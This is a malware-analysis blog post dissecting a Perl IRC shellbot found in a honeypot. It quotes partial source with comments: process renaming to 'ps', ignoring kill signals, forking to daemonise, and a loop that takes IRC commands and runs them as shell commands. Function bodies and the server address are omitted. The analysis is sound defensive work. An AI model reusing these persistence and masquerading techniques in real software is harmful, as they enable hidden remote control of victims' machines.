High Level Overview of a Malicious Perl Bot

This blog post was authored by Veronica Valeros and Israel Leiva.


In this blog post we will do a high level and quick analysis of a Perl malware dropped in one of our honeypots. We will briefly discuss its main functions and what is supposed to do. The goal was to understand more of Perl while understanding what the malware is expected to do.

Here we go.

A malicious Perl bot

A new malicious file [1] was downloaded last week in one of our honeypots. It was uncommon as it wasn't like most of the other files typically downloaded there like Mirai, and Hide n' Seek. The malicious file is a Perl script which, interestingly, contain strings in Portuguese. The file is identified with the following hashes:

SHA256: 4188692fd507fe4c362ad5aa99b5db01673e88ec8bfe605986ceb1480c2e6c97
MD5: 35a12b75a54af8058f8dadfbfd19a4e5

The first submission to VirusTotal was made on May 11, 2018. The AV coverage (35/61) showed that AV vendors identified this generally as a Perl Shellbot. 

Screen Shot 2018-05-24 at 19.23.24.png

Symantec was the only AV to give it a specific name, Santy, which led us to find more concrete information about this threat.

According to a report from Symantec [2], this family was first identified back in 2004 (14 years ago!). It is a worm that attacks vulnerable web servers. While the code of this malware seems similar, there are many variations of the original code out there, which makes it more difficult to tell if this is the same family of malware or not.

Understanding the code

After a quick first look at the code we can see we have three main things: initialisation of variables, declaration of functions, and what looks like the main code.


In Perl, the symbol used in the front of the variable indicates its type:

  • The '@' symbol is used to declare 'arrays'
  • The '%' symbol is used to declare dictionaries with a key:value format
  • The '$' symbol is used to declare scalar variables

In Perl you can restrict the scope of the variables you declare. If nothing is specified, a variable is assumed to be Global. To restrict the scope of a variable the keyword 'my' should be used before the variable declaration.

# Considering the syntax used by Perl, the first variable declaration 
# in the code (line 1.) raises some concern. It is trying to declare 
# what appears to be an array but using a scalar type of variable. 
# This wouldn't break the execution of the code, but it will cause the
# last value of the array ("ps") to be the only valid value of the variable $processo.
1. my $processo =("top","htop","ps");

# Line 2. defines an array with common Web application resources and
# parameters. 
2. my @titi = ("index.php?page=","main.php?page=");

# Line 3. defines a variable which will contain one of the web
# resources stored in the previous variable chosen randomly from 
# the array.
3. my $goni = $titi[rand scalar @titi];

# Line 4. defines a 'maximum number of lines' variable of value 3.
4. my $linas_max='3';

# Line 5. sets a variable 'sleep' with a value of 7.
5. my $sleep='7';

# Line 6. defines an array 'adms' with some key letters 'qwerty' +
# 'xyz'.
6. my @adms=("x", "y", "z", "w", "q", "e", "r", "t", "y");

# Line 7. declares a new array called 'hostauth', probably short of
# 'host authentication', with a single value 'local'
7. my @hostauth=("local");

# Line 8. declares an array named 'canais' which translates from
# Portuguese to 'channels'. 
# The variable is initialized with a single value '#tn'
8. my @canais=("#tn");

# The 'chop' function "removes the last character of a string and
# returns that character. If given a list of arguments, the operation
# is performed on each one and the last character chopped is returned.
# It seems this would return a single character. This character is the
# last one from the uname command (name and information of the host in
# which the script is running).
9. chop (my $nick = `uname`);

# Line 10. sets a variable that translates to 'server' with a default
# IP address value of
10. my $servidor="";

# Lines 11-13 define parameters related to IRC: name, real name, 
# and port.
11. my $ircname =("g");
12. my $realname = ("g");
13. my @ircport = ("80","80");

# Line 14 stores in a variable 'porta', which translates to 'door', a
# random port number form the ones defined in line 13 (Not much real
# choice there).
14. my $porta = $ircport[rand scalar @ircport];

# Line 15. defines a variable which seems to be storing the version of
# the script: 0.5.
15. my $VERSAO = '0.5';

# Lines 16-20 are for ignoring any significative signal received by 
# the script. 
# INT is for terminal interrupt (e.g. CTRL+C key sequence); 
# HUP is for hang up, "The HUP signal is sent to a process when its
# controlling terminal is closed" [4]; # TERM is a termination signal; 
# CHLD is a signal that indicates that the child process has ended or
# changed; PS doesn't map to any known signal afaik.
16. $SIG{'INT'} = 'IGNORE';
17. $SIG{'HUP'} = 'IGNORE';
18. $SIG{'TERM'} = 'IGNORE';
19. $SIG{'CHLD'} = 'IGNORE';
20. $SIG{'PS'} = 'IGNORE';

Perl has different ways to import modules. One of them is through the function 'use'. According to [5], [use] "Imports some semantics into the current package from the named module, generally by aliasing certain subroutine or variable names into your package."

#Lines 21-22, import libraries used to create and manipulate sockets.
21. use IO::Socket;
22. use Socket;

# Line 23. imports a library used to handle system calls.
23. use IO::Select;

# Line 24. forces the script to change the current directory to '/tmp'.
24. chdir("/tmp");

# Line 25. overwrites the content of variable 'servidor', aka 'server',
# if the value was passed as an argument.
25. $servidor="$ARGV[0]" if $ARGV[0];

# Line 26. seems to concatenate the value on 'processo', "ps", with
# sixteen "\0", which is an ASCII NUL character. It then assigns this
# value to $0 to rename its own process name.
26. $0="$processo"."\0"x16;;

# Lines 27-29 are typically used to deamonize a script. These
# intructions will create a child process and let the parent exit.[6]
27. my $pid=fork;
28. exit if $pid; 
29. die "Problema com o fork: $!" unless defined($pid);

According to the Perl documentation, "our makes a lexical alias to a package (i.e. global) variable of the same name in the current package for use within the current lexical scope".

# Lines 30-31 create aliases for the variables (?). 
30. our %irc_servers;
31. our %DCC;

# Lines 32-33 create a new interface for 'Select' system calls.
32. my $dcc_sel = new IO::Select->new();
33. $sel_cliente = IO::Select->new();

63. my $line_temp;

At this point, the types, names and values of the variables give away some information of what this piece of malware is going to do. There's information to connect to IRC servers; there are web resources defined; and the script tries to daemonize itself after execution. Let's go deeper.


As we mentioned previously, there is a considerable number of functions defined on the script. We will briefly describe them here before discuss the main logic of the malware. The last section of this blog will discuss the details of these functions.

# This function sends raw information through a socket
34. sub sendraw {}

# This functions establishes a connection to a server using information
# passed on parameters
# E.g.: conectar("$nick", "$servidor", "$porta");
42. sub conectar {}

# This function parses single IRC responses and performs different
# actions according to the messages received, the user who sent them
# and the host used. 
102. sub parse {}

# This function parses different instructions received by the parse()
# function and performs different IRC commands (listed below in lines
# 246-279).
150. sub ircase {}

# This function receives and executes system commands sent by parse()
# and send the result to a given user, line by line.
216. sub shell {}

# The rest of the declared functions are used to respond/send specific
# IRC commands.
246. sub ctcp {}
250. sub msg {}
254. sub notice {}
258. sub op {} //sends MODE adding an operator status
252. sub deop {} //sends MODE removing an operator status
266. sub j {} 
267. sub join {} //sends a JOIN instruction to a certain channel
271. sub p {} 
272. sub part {} //sends a PART instruction to remove the user from certain channels
275. sub nick {}
279. sub quit {}


The main logic of the malware is quite simple. Following the methodology of the previous section, we will explain it line by line via comment the code below.

# The main script is designed to run forever via a simple 
# While True loop
64. while( 1 ) {

# The first section is about getting a working connection to the 
# IRC server.
65.   while (!(keys(%irc_servers))) { conectar([redacted-parameters]); }
66.   delete($irc_servers{''}) if (defined($irc_servers{''}));
67.   my @ready = $sel_cliente->can_read(0);
68.   next unless(@ready);
# The malware instantiates a new server or closes it if there were 
# zero bytes read from it.
69.   foreach $fh (@ready) {
70.     $IRC_cur_socket = $fh;
71.     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
72.     $nread = sysread($fh, $msg, 4096);
73.     if ($nread == 0) {
74.        $sel_cliente->remove($fh);
75.        $fh->close;
76.        delete($irc_servers{$fh});
77.     }

# The incoming message read from the server is split in lines
# for further processing
78.     @lines = split (/\n/, $msg);

# Each line is sent following different logic to the parse() function
79.     for(my $c=0; $c<= $#lines; $c++) {
97.     }
98.   }
99. }

As we can see from the the code above, the malware execution flow is quite simple: 1. creates a connection, 2. receives messages, 3. process message, 4. repeat. The core functions are 'parse()' and 'ircase()', which contain the specific actions for the commands received. The script has the ability to parse common options like join, msg, change the mode; it can also send raw messages back to the server, send direct connections to other client using CTCP protocol, and execute commands on the infected machine. At first look, the parameters that were set up with the web resources are not used.

The parse() function

This function is on charge of handling messages received by the bot and perform specific actions. These actions include:

  • Reply to PINGs from the IRC server.
  • React to automatic or manual nick changes and join the set of channels @canais.
  • Handle messages received from the sets of @adms on @hostauth. These messages may ask for execution of commands on the infected server using the shell() function, sending back the response to one of the @adms. It also handles the execution of IRC commands by calling the ircase() function.

The logic and syntax of this function indicates that the code has probably been adapted from an existing bot which had a broader scope.


Our analysis indicates that this bot is an adaptation of other malware. Being written in Perl and not obfuscated, this type of malware is easy to copy, adapt, and re-deploy. In the bottom of this blog post it is possible to find a list of malware samples that are closely related to the version analyzed here, with small changes but clearly related as they connect to the same IRC channel. While not the typical malware, we observe this type of samples quite frequently in our SSH/Telnet honeypots. 


[1] https://www.virustotal.com/en/file/4188692fd507fe4c362ad5aa99b5db01673e88ec8bfe605986ceb1480c2e6c97/analysis/
[2] https://www.symantec.com/security-center/writeup/2004-122109-4444-99
[3] https://en.wikipedia.org/wiki/Santy
[4] https://www.computerhope.com/unix/signals.htm
[5] https://perldoc.perl.org/functions/use.html
[6] http://mkweb.bcgsc.ca/intranet/perlbook/cookbook/ch17_16.htm
[7] https://perldoc.perl.org/functions/our.html

Related Malware Samples

We identified that the following malware samples are variations of the same type of Perl Shellbot.